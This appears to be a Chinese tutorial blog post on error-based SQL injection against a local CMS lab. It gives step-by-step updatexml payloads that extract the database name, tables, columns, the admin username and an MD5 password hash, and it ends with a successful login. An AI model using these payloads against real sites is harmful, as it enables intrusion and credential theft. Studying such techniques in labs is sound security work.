SQL注入之报错注入

文章目录

报错注入是什么？
报错注入获取cms账号密码
成功登录

报错注入是什么？

在注入点的判断过程中，发现数据库中SQL 语句的报错信息，会显示在页面中，因此可以利用报错信息进行注入。
报错注入的原理，就是在错误信息中执行SQL 语句。触发报错的方式有很多，具体细节也不尽相同。此处建议直接背公式，将公式带换掉 1=1 的部分。

报错注入就是在判断SQL注入的注入点时发现数据库的报错信息会回显到页面上，那么就可以对报错信息进行注入操作。

报错注入获取cms账号密码

打开cms数据库的网页：http://127.0.0.1/cms/show.php?id=33，

打开hackbar插件，在URL中输入命令测试：

报错注入公式：

updatexml(1,concat(0x5e,(select database()),0x5e),1)

获取数据库名：

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

运行结果：

数据库名为cms

在这里插入图片描述

获取表个数：

count（*）：获取表个数

0x5e:^符，用来分割报错和输出的结果

concat：将多个字符连接成一个字符串

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

运行结果：

一共有8个表

在这里插入图片描述

逐个获取表名：

报错注入不同于联合查询，它只能逐个获取表名

limit 0，1：用来限定取第0行的一行记录，由于有8个表，也就是有8行数据，多取会报错。

information_schema 元数据数据库

存储库名、表名（-- tables）

存储列名（-- columns)））

取第0行的一行记录：

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

运行结果：

找出表名cms_article

在这里插入图片描述

去第1行的一行记录：

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e),1)

运行结果：

找出表名cms_category

在这里插入图片描述

以此类推，直到取出所有表名：

cms_article

cms_category

cms_file

cms_friendlink

cms_message

cms_notice

cms_page

cms_users

获取cms_users表的列的个数：

table_name=0x636d735f7573657273是cms_users表名转16进制后的结果，如果直接用表名’cms_users’，会导致表名被cms**转义并报错，**所以需要避免单引号的使用。

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273),0x5e),1)

运行结果：

cms_users表中一共有三列数据

在这里插入图片描述

获取cms_users表的列的字段（内容）：

limit 0，1：用来限定取第0行的一行记录，由于有3行数据，多取会报错。

limit 1，1：用来限定取第1行的一行记录，由于有3行数据，多取会报错。

…

取第一行数据：

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

运行结果：

在这里插入图片描述

取第二行数据：

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 1,1),0x5e),1)

运行结果：

在这里插入图片描述

取出的所有字段：

userid
username
password

获取username的内容：

?id=33 and updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)

运行结果：

用户名为admin

在这里插入图片描述

获取password中的密文：

length(password)：获取password的密文长度，由于password中的密码是一段md5密文，长度过长，不能一次取出，先获取长度后分次取出。

获取密文长度：

?id=33 and updatexml(1,concat(0x5e,(select length(password) from cms_users limit 0,1),0x5e),1)

运行结果：

md5密文长度是32

在这里插入图片描述

取前16位密码：

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1)

运行结果：

前16位md5密码密文

在这里插入图片描述

取后16位密码：

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1)

运行结果：

后16位密文

在这里插入图片描述

拼接后获得md5密码密文：

e10adc3949ba59abbe56e057f20f883e

解码得到明文密码：

成功登录

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/95508.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

SQL注入之报错注入

文章目录

报错注入是什么？

报错注入获取cms账号密码

成功登录

相关文章

虚拟化技术：云计算发展的核心驱动力

Particle Life粒子生命演化的MATLAB模拟

C#: Json序列化和反序列化，集合为什么多出来一些元素？

Node爬虫项目精简版 wallhaven网站实操 2023.8.29

SpringBoot案例-基础登录功能

Unity打包Windows程序，概率性出现无法全屏或分辨率不匹配

安装Ubuntu服务器、配置网络、并安装ssh进行连接

简易虚拟培训系统-UI控件的应用3

Node.js crypto模块加密算法

springboot整合modbus4J（一）

【推荐】Spring与Mybatis集成整合

「Redis」1. 数据类型的底层实现

LeetCode56.合并区间

Wireshark数据抓包分析之互联网控制报文协议_ICMP

【Linux】如何在linux系统重启或启动时执行命令或脚本(也支持docker容器内部)

打造互动体验：品牌 DTC 如何转变其私域战略

用 PHP 和 JavaScript 显示地球卫星照片

Android SDK 上手指南｜｜第五章用户界面设计

nvm安装electron开发与编译环境

同源策略与解决方法